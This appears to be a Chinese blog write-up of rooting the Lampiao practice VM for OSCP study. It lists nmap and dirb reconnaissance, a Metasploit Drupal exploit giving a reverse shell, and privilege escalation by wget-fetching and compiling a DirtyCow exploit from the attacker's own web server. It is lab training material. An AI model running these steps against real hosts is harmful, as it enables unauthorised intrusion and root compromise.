OSCP Lampiao 靶机渗透

Lampiao 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-22

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Lampiao主机ip为172.16.1.15

nmap扫下所有端口

nmap -p- -A 172.16.1.15

看下有两个http,看下80端口,就这样一个东西,查看源代码也没有,估计是修改了默认端口

我们再看下1898端口

是个登录页面,我们dirb下看看目录下有什么

dirb http://172.16.1.15:1898

发现了robots.txt,我们看看写了什么,原来是一个访问控制列表,我们在这里发现了敏感文件CHANGELOG.txt,更新日志

查看更新日志,发现是Drupal的

二、web渗透

我们使用msf查看下是否有渗透脚本

msfconsole

search Drupal

使用这个漏洞

配置成如下然后直接run

成功反弹shell,我们改为交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

三、提权

我们试试自动检测,看看有没有直接提权的exploiot

在/var/www/html目录下下载exploit suggester

git clone https://github.com/mzet-/linux-exploit-suggester

mv linux-exploit-suggester.sh ..

开启服务

service apache2 start

然后使用受害机下载

wget http://172.16.1.4/linux-exploit-suggester.sh

赋予执行权限并运行

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

发现可能存在的漏洞dirtycow

网上搜索找到exploit 40847

由于是c++文件,我们将下载代码保存为lampiao.cpp

然后移动文件到我们的apache2文件夹下

mv lampiao /var/www/html

受害机下载我们的文件

wget http://172.16.1.4/lampiao.cpp

然后进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow lampiao.cpp -lutil

赋予执行权限

chmod +x dcow

执行,成功获得root密码

./dcow

切换到root用户输入密码,成功获得root权限

四、总结

这次靶机没什么难度,主要是尝试msf时候花费了点时间

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值